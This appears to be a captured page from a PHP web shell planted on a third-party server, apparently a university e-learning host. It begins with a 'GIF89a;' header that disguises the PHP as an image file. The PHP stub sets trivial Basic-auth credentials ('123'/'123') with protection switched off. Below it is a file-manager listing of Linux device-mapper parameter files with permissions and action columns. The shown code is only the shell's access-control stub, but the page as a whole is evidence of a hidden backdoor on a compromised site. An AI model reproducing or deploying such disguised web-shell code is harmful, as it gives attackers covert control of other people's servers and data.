GIF89a;
# Konfigurasyon
$sayfaSifreleme ='0'; # 1 acik , 0 kapali
$kullaniciAdi = '123';
$sifre = '123';
# yetki kontrol fonksiyonu
function yetkiKontrol($kullaniciAdi,$sifre) {
if(empty($_SERVER['PHP_AUTH_USER']) || empty($_SERVER['PHP_AUTH_PW']) || $_SERVER['PHP_AUTH_USER'] != "$kullaniciAdi" || $_SERVER['PHP_AUTH_PW'] != "$sifre") {
header('WWW-Authenticate: Basic realm="x"');
die(header('HTTP/1.0 401 Unauthorized'));
}
}
# Sayfa Sifreleme aciksa
if($sayfaSifreleme =='1') {
# Veri ve sifre kontrolu
yetkiKontrol($kullaniciAdi,$sifre);
}
?>
eclass.unmer.ac.id
| Name |
Size |
Modified |
Perms |
Actions |
| dm_mq_nr_hw_queues |
4.00 KB |
October 30 2025 18:42:32. |
0644 |
|
|
| dm_mq_queue_depth |
4.00 KB |
October 30 2025 18:42:32. |
0644 |
|
|
| dm_numa_node |
4.00 KB |
October 30 2025 18:42:32. |
0644 |
|
|
| kcopyd_subjob_size_kb |
4.00 KB |
October 30 2025 18:42:32. |
0644 |
|
|
| reserved_bio_based_ios |
4.00 KB |
October 30 2025 18:42:32. |
0644 |
|
|
| reserved_rq_based_ios |
4.00 KB |
October 30 2025 18:42:32. |
0644 |
|
|
| stats_current_allocated_bytes |
4.00 KB |
October 30 2025 18:42:32. |
0444 |
|
|
| swap_bios |
4.00 KB |
October 30 2025 18:42:32. |
0644 |
|
|
| use_blk_mq |
4.00 KB |
October 30 2025 18:42:32. |
0644 |
|
|